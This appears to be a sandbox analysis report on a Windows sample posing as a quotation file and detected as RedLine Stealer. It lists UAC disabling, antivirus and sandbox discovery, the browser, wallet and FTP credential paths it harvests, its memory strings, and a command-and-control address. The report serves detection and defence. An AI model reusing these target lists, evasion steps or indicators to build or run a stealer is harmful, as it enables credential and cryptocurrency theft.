                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disables UAC (registry)
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: InstallUtil.exe, 00000005.00000002.2393159826.00000000066E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5652, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: QUOTATION#09678.exe, 00000000.00000002.2270306101.000002CCFF140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDERB38FC1F0
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5652, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5652, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		311
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		341
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                    Virtualization/Sandbox Evasion                    		Security Account Manager251
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546607 Sample: QUOTATION#09678.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 27 api.ip.sb 2->27 31 Multi AV Scanner detection for domain / URL 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 11 other signatures 2->37 8 QUOTATION#09678.exe 1 4 2->8         started        signatures3 process4 signatures5 39 Found many strings related to Crypto-Wallets (likely being stolen) 8->39 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->41 43 Writes to foreign memory regions 8->43 45 4 other signatures 8->45 11 InstallUtil.exe 15 50 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 2 other processes 8->19 process6 dnsIp7 29 94.141.120.6, 49704, 49712, 49754 UNITLINE_RST_NET1RostovnaDonuRU Russian Federation 11->29 47 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->47 49 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 53 Tries to steal Crypto Currency Wallets 11->53 21 conhost.exe 11->21         started        55 Loading BitLocker PowerShell Module 15->55 23 conhost.exe 15->23         started        25 WmiPrvSE.exe 15->25         started        signatures8 process9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    QUOTATION#09678.exe32%VirustotalBrowse
                    QUOTATION#09678.exe29%ReversingLabsWin64.Trojan.Generic
                    QUOTATION#09678.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    94.141.120.6:5512316%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://ipinfo.io/ip%appdata%0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    94.141.120.6:55123trueunknown
                    http://94.141.120.6:55123/true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmptrueunknown
                      https://duckduckgo.com/chrome_newtabtmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalseunknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/CheckConnectResponseInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.datacontract.org/2004/07/InstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
